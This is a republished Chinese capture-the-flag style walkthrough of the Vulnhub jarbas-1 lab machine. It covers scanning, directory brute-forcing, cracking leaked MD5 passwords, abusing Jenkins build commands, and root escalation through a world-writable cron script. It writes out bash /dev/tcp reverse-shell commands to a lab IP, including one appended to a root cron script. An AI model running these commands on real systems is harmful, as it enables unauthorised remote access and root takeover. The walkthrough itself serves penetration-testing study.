我的编程空间,编程开发者的网络收藏夹
学习永远不晚

【甄选靶场】Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

【甄选靶场】Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)

Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月18日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路


本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


信息收集

首先进行存活主机的探测

nmap -sP 192.168.247.0/24

找到了.146的主机
在这里插入图片描述而后进行服务探测

nmap -p- --min-rate 10000 -A 192.168.247.14622/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)|_http-title: Jarbas - O Seu Mordomo Virtual!| http-methods: |_  Potentially risky methods: TRACE|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.163306/tcp open  mysql   MariaDB (unauthorized)8080/tcp open  http    Jetty 9.4.z-SNAPSHOT|_http-title: Site doesn't have a title (text/html;charset=utf-8).| http-robots.txt: 1 disallowed entry |_/|_http-server-header: Jetty(9.4.z-SNAPSHOT)

总结一下得知的信息如下

端口 22:OpenSSH 7.4端口 80:Apache httpd 2.4.63306 端口:mysql (MariaDB)端口 8080:http(Jetty 9.4.z-SNAPSHOT) 

对于80端口,没有现成的exp,并且谷歌能搜的东西相对较少,所以不考虑exp利用,而后就是3306,无法外部连接,所以同样不管
ssh版本没有可利用的exp,8080端口存在用户登录
我将尝试弱口令无效,所以开始目录爆破

gobuster dir -u http://192.168.247.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php -t 10

在这里插入图片描述
得到了access.html
出现了很多的md5,进行破解

在这里插入图片描述得到md5/明文凭据如下

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

tiago: italia99trindade: mariannaeder: vipsu

最终eder: vipsu可以成功登陆

jenkins

这是一个类github的项目管理,通常来说,根据已经遇到的类github的中间件,总结出可能漏洞点:直接的命令执行,对现存的任务进行分支合并,如果是建站的任务,那么可以分支合并来避开主线无权修改的问题从而分支合并一个shell,而后达成反弹shell

那么我将按照常规的寻找步骤,看看新建一个任务,我会注意观察各个选项,看能不能执行命令(寻找过程就不放图了,直接放最终的成功的路径)
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述此处可以执行命令

 /bin/bash -i >& /dev/tcp/192.168.247.130/4444 0>&1 

在这里插入图片描述而后点击立即构建
在这里插入图片描述本地接受到

提权

我首先利用了常规的手工枚举方法,我找到了计划任务,并且细致查看之后,发现他是全局可写,并且是root权限,那么我将写一个bash命令而后等待连接

cat /etc/crontab

在这里插入图片描述
在这里插入图片描述写入一个命令

echo "/bin/bash -i >& /dev/tcp/192.168.247.130/4443 0>&1" >> /etc/script/CleaningScript.sh 

本地获得root权限
在这里插入图片描述

来源地址:https://blog.csdn.net/weixin_65527369/article/details/128728330

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

【甄选靶场】Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录